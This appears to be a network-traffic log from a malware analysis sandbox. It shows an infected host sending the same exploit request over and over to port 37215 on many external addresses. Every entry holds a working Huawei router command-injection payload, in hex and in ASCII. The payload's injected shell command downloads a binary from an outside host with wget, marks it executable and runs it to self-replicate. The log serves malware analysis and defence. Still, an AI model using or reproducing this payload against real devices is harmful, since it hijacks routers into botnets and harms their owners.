                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1245192.168.2.1540640197.73.16.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.768280029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1246192.168.2.1534010197.15.175.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.768527985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1247192.168.2.1535128197.131.177.18937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.769869089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1248192.168.2.1560088171.174.230.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.770544052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1249192.168.2.1560660152.155.146.137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.771804094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:02.029525042 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1250192.168.2.1556532197.225.187.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.772005081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1251192.168.2.153420841.34.105.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.773535967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1252192.168.2.154155841.130.106.24037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.773560047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1253192.168.2.153945241.181.212.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.773935080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 